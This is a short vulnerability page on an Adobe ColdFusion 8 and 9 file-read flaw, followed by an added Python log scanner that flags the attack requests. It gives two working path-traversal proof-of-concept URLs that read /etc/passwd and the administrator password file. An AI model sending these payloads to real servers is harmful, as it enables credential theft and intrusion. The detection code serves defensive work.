Adobe ColdFusion File Read Vulnerability

Last updated: 2020-09-21 13:01:58

Affected versions

Adobe ColdFusion 8, 9

Vulnerability PoC

Read /etc/passwd

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

Read the back-end administrator password

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
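
A detection check for the two requests above, as an added example that is not part of the original page: it scans web access logs for requests to enter.cfm whose locale parameter carries path traversal or a null byte. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET_PATH = "/cfide/administrator/enter.cfm"  # endpoint used by both PoC URLs
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Sep/2020:13:01:58 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en HTTP/1.1" 200 1843
198.51.100.7 - - [21/Sep/2020:13:02:03 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 200 912
203.0.113.20 - - [21/Sep/2020:13:05:10 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
203.0.113.20 - - [21/Sep/2020:13:05:12 +0000] "GET /index.cfm?page=../about HTTP/1.1" 200 300
"""

def normalize(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide the pattern."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def locale_findings(target):
    """Return the reasons a request target matches the locale file-read pattern."""
    parts = urlsplit(target)
    if normalize(parts.path).lower() != TARGET_PATH:
        return []
    reasons = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "locale":
            continue
        value = normalize(value)
        if ".." in value.split("/"):
            reasons.append("path traversal")
        if "\x00" in value:
            reasons.append("null byte")
    return reasons

def scan(log_text):
    """Return (client_ip, request_target, reasons) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        reasons = locale_findings(m.group("target")) if m else []
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A legitimate locale value is a short language tag such as `en`, so any hit from this check on a ColdFusion 8 or 9 host merits review of what the response returned.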